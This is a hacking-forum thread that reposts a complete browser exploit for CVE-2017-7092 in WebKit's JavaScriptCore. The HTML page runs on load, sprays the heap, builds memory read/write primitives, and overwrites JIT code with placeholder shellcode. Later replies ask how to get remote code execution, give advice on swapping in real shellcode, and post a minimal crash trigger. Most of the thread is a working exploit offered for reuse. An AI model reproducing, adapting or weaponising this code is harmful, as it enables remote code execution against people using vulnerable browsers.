Nytro Posted September 26, 2017 Report Share Posted September 26, 2017 <html> <head> <script> // b JavaScriptCore`JSC::CopiedSpace::didStartFullCollection() + 218 big_array = []; debug = 0; arr = []; evil_buffer = {}; bigarray_buffer_index = 0; buffer_arr_index = 0; function_to_shellcode = {} function log(txt) { var c = document.createElement("div"); c.innerHTML = "log: " + txt; d.appendChild(c); } function debug_alert(str){ if(debug){ alert(str); log(str); } } function gc() { debug_alert("gc"); for(i = 0;i < 0x924924;i++){ //0x4924924 arr[i] = new ArrayBuffer(20); //54 } debug_alert("gcc"); } function gc2() { try { var c = document.createElement("canvas"); var gl = c.getContext("2d"); for (var i = 0; i < 100; i++) { var gggg = gl.createImageData(1, 0x10000/4) } } catch (e) { } } function make_a_big_hole(){ g = [] gg = "g".repeat(0x7fff1000) debug_alert("big_hole"); for(var i = 0; i < 5;i++){ g[i] = String.prototype.fontsize.call(gg,5); } debug_alert("after_big_hole"); for(var i = 0; i < 0x3;i++){ g[0] = null; //gc //g[1] = null; g[2] = null; //".replace g[3] = null; //hole } //g = null; debug_alert("big_array"); init_big_array_len = 0x10000000; g[2] = new Array(init_big_array_len); g[2].fill(1.1); debug_alert("after_big_array"); big_array = g[2]; //evil_float64 = new Float64Array(new ArrayBuffer(0x7ffffff0)); //arr2 = []; arr2[0] = evil_float64; //heap_feng_shui(); gg = null; gc(); } function make_evil_data(){ nop = "\x00" nop_data = "" offset = 0x38 + 0x1e +0x38 nop_data = nop.repeat(offset/2); //nop_data = nop_data + "\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff" nop_data = nop_data + unescape("%uffff%uffff%uffff%uffff") + "\x00\x00\x00\x00" + unescape("%uffff%uffff%uffff%uffff"); ff = "\x00" ff_data = ff.repeat((0x1000-offset-0x18)/2); return nop_data + ff_data; } function heap_feng_shui(){ debug_alert("heap_feng_shui"); arr2 = [] buffer_arr = [] /* for(var i = 0;i < 20;i++){ //arr2[i] = new Array(0x1000); buffer_arr[i] = new Float64Array(0x2000001); // buffer_arr[i].fill(1.1); //float64 1.1 == array 1.0375 }*/ for(var i = 0;i < 0x18000;i++){ evil_float64 = new Float64Array(new ArrayBuffer(0x8000)); evil_float64.fill(1.1); buffer_arr[i] = evil_float64; } debug_alert("after_heap_feng_shui"); } function f64tou32(number){ a = new Float64Array(0x8); a.fill(number); b = new Uint32Array(a.buffer); result = []; result[0] = b[0]; result[1] = b[1]; return result; } function u32tof64(arr){ b = new Uint32Array(0x8); b[1] = arr[1]; b[0] = arr[0]; a = new Float64Array(b.buffer); return a[0]; } function read_obj(obj){ big_array[bigarray_buffer_index] = obj; f64_address = buffer_arr[buffer_arr_index][0x50/8]; uint32 = f64tou32(f64_address); // alert(uint32[1].toString(16)+ " " + uint32[0].toString(16)); return uint32; //alert(uint32[1].toString(16)+ " " + uint32[0].toString(16)); } function fake_obj(arr_address){ f64_address = u32tof64(arr_address); // alert(f64_address); buffer_arr[buffer_arr_index][0x50/8] = f64_address; // alert("here"); return big_array[bigarray_buffer_index]; } function randomString(){ chars = "abcdefghijklmnopq"; maxPos = chars.length; result = ""; for(i = 0;i < 0x8;i++){ result += chars.charAt(Math.floor(Math.random() * maxPos)); } return result; } function sprayFloat64ArrayStru(){ for(var i = 0; i < 0x1000;i++){ var a = new Float64Array(1); a[randomString()] = 1337; } } function Int64(arr){ uint32 = []; uint32[0] = arr[0]; uint32[1] = arr[1] - 0x10000; f = u32tof64(uint32); return f; } function Int64_add(arr,num){ arr[0] = arr[0] + num; return arr; } function read_64(addr){ f = u32tof64(addr); fakearray[0x2] = f; result = []; result[0] = evil_buffer_array[0]; result[1] = evil_buffer_array[1]; //alert(result[1].toString(16)+ " " + result[0].toString(16)); return result; } function write_32(addr,data){ f = u32tof64(addr); fakearray[0x2] = f; evil_buffer_array[0] = data; } function make_jit_function(){ func_body = "eval('');abc = [];" for(i = 0;i<500;i++){ func_body += "abc[" + i.toString() + "];" } function_to_shellcode = new Function("a",func_body); // alert("here") for(i = 0;i < 100; i++){ function_to_shellcode(); } // alert("here") } function trigger() { //alert(2); // make_jit_function(); evil_data = make_evil_data(); a = evil_data.repeat(0x7fff0000/0x800); z = a.slice(1); x = "\"".repeat(0x2aaaaaa0); //alert("1"); // alert(evil_data.length.toString(16)); make_a_big_hole(); z = String.prototype.link.call(a,x) alert("The Array length is 0x" + big_array.length.toString(16)); heap_feng_shui(); //z = null; //a = null; //x = null; // heap_feng_shui(); //alert("end"); //Array.prototype.slice.call(arr,1); //Array.prototype.slice.call(buffer_arr,1); t = Array.prototype.slice.call(big_array,0x10000001,0x10000002); t = Array.prototype.slice.call(buffer_arr,1,2); if(big_array.length != init_big_array_len){ // alert("Success!The Array length is 0x" + big_array.length.toString(16)); // alert(big_array[0x1]); /*for(var i = 0x10000000;i < big_array.length;i++){ if(big_array[i] != undefined && big_array[i] != -1){ alert(i.toString(16)); alert(big_array[i]); } }*/ flag = 0; for(var i = 0x35000000;i < 0x4a000000;i=i+0x2000){ //0x4a000000 //alert(i.toString(16)); if(big_array[i] == 1.0375){ alert("find Success"); bigarray_buffer_index = i; big_array[bigarray_buffer_index] = 3.3333333; j = 0; while(j<0x18000){ if(buffer_arr[j][0x50/8] != 1.1){ buffer_arr_index = j; flag = 1; break; } j++; } break; } } if(flag == 0){ alert("can't find buffer!"); window.location.reload(); } } else{ alert("can't overwrite the length!"); window.location.reload(); } //alert(buffer_arr_index); make_jit_function(); sprayFloat64ArrayStru(); evil_buffer_array = new Uint32Array(0x1000); var jsCellHeader = Int64([0x00001000,0x11827000]); var lengthFlags = Int64([0x00000010,0x00010000]); var container = { jsCell : jsCellHeader, butterfly : false, vector : evil_buffer_array, lengthAndFlags : lengthFlags }; address = Int64_add(read_obj(container),0x10); //alert(address[1].toString(16) + " " + address[0].toString(16)); fakearray = fake_obj(address); //String.prototype.link.call(container); while(!(fakearray instanceof Float64Array)){ i = 1; jsCellHeader = Int64([0x00001000+i,0x11827000]); container.jsCell = jsCellHeader; i++; } //String.prototype.link.call(fakearray); func_addr = read_obj(function_to_shellcode); // alert(func_addr[1].toString(16)+ " " + func_addr[0].toString(16)); executableAddr = read_64(Int64_add(func_addr,0x18)); jitCodeAddr = read_64(Int64_add(executableAddr,0x18)); codeAddr = read_64(Int64_add(jitCodeAddr,0x20)); write_32(codeAddr,0xcccccccc); //codeAddr = read_64(Int64_add(jitCodeAddr,0x10)); //write_32(codeAddr,0xcccccccc); alert("begin_shellcode!!!!!!"); function_to_shellcode(); alert("end"); } </script> </head> <body onload="trigger()"> <pre id="d"> </pre> </body> </html> Sursa: https://github.com/xuechiyaobai/CVE-2017-7092-Exploit 1 Quote Link to comment Share on other sites More sharing options...
darkhunter98 Posted June 19, 2018 Report Share Posted June 19, 2018 How can i use this for rce? 1 Quote Link to comment Share on other sites More sharing options...
QuoVadis Posted June 19, 2018 Report Share Posted June 19, 2018 39 minutes ago, darkhunter98 said: How can i use this for rce? Sunt detalii pe https://gloryholefoundation.com 1 Quote Link to comment Share on other sites More sharing options...
Nytro Posted January 16, 2019 Author Report Share Posted January 16, 2019 Probably you need to update it (replace 0xcccccccc with your shellcode - first 4 bytes, and continue). Not sure. write_32(codeAddr,0xcccccccc); Quote Link to comment Share on other sites More sharing options...
ARUBA Posted January 17, 2019 Report Share Posted January 17, 2019 var s = 'x'.repeat(0x7fffffff); http://s.link (s); https://github.com/WebKit/webkit/blob/bce57f1454bb396d3e8133da38a906d31bdf8ad1/Source/JavaScriptCore/runtime/StringPrototype.cpp#L1808 Quote Link to comment Share on other sites More sharing options...